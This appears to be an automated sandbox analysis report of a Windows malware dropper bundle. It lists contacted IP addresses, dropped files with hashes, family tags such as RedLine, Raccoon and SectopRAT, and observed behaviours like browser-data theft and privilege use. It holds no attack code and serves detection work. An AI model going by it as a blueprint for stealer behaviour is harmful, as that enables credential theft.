FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 bc10ee7cbbf3ea8b505c94bd655f5e50
SHA1 4667e7d52e54ba83ee7c264c14171a4db0d1c444
SHA256 33ea6a4e83204a0798a7a4e6d3361618e171d37342ed1b16d33b504eafb3b111
SHA512 a1e2349e226e83fa041ca5ade434927c5ca2a7f4c3f322944cce829c7ae5aa47376b7a9825618d3393668751baa3b45be55c749625344764a2532e92a167815f

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe

MD5 35799316b448a835e4784fbdd26b5648
SHA1 fc39b78cc7615b4cbc65aff8b4d14d7b1b234cd5
SHA256 2a41d70eb106e926765798e9a407e88e49c07099247cd33924d7faa60e3e7ef0
SHA512 ae2d8b3bccbe0e7820ba6c25d76251c400b40a40fbd610b182ae8ec51154e66670b30cf13a62d06067024e9ffb9447bea6647be312e2c01f0ac6c4ea602a9660

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe

MD5 508251b34a5ea5271e6c8d365b3623d2
SHA1 a6f057ba3154fca2a2000cbb7ee9c171c682a8ac
SHA256 a111e371822094423c652cef67b75663d97e7d7a18c33213d745a1f2075d210f
SHA512 981e33ee2c1d699304165d7d96af3de99509b7dc0ce6f7a3e49c763f58ae4227f1d60056997adc366de9203d86d469de3062542b2ba147303848d6e4d26bf170

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06384ea2548.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe

MD5 cf1ef22fba3b8080deab8dd3ec2dbe79
SHA1 62c57835497002d7f760fabb77969281b4ccf3e0
SHA256 0826cf8b1478cc5c892d724e30c9d69a0fd765780f916bb0943d73f3cd3866e0
SHA512 7a997cbbbdccc75a624ee9f67632024479fdb7a1588c462479c0d4b967373290640bd6b98d08f633d5e71d026faf5343de1d3a61c125e1a04d5ea518275a9e1f

\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe

MD5 c950dfa870dc50ce6e1e2fcaeb362de4
SHA1 fc1fb7285afa8d17010134680244a19f9da847a1
SHA256 b7fd0c0227a445847a051fe986bc517e2b136682d98dbe5349e2bc75e0e9e4ec
SHA512 4117875063173b5767b98300d493e2aee310a76651411ceb2f34588ae5785a0893979699c10e07d0f52d84442db6967b7155875bc7ef738a8e2c49fa70acd1f2

\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-J1DPV.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-J1DPV.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LJXEGA87TDX8247FU3MX.temp

MD5 794da3a27b3d340793e14266f6d479f8
SHA1 5ad8b9c2a2dc1614975fabe72b965843004c1a35
SHA256 a2dfdb16600066aab5ff67f4cff16c1c237f40e85a061cad7c749246c3624a28
SHA512 90679ec1677bc360f1ff6ce66d3c66102fa3c0141e6ec1a7968e2a6040a858194838462f73a3d31d78b3298e323107a801b61c70136cd0db3916f5620573a813

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS028D4896\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS028D4896\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19ac3c92c21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c9e031f4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cd42a7c874e44.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up geolocation information via web service

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cef5687a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19ac3c92c21.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c28f648204dbd4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue197e9ec0ff0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331646796819" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cd42a7c874e44.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
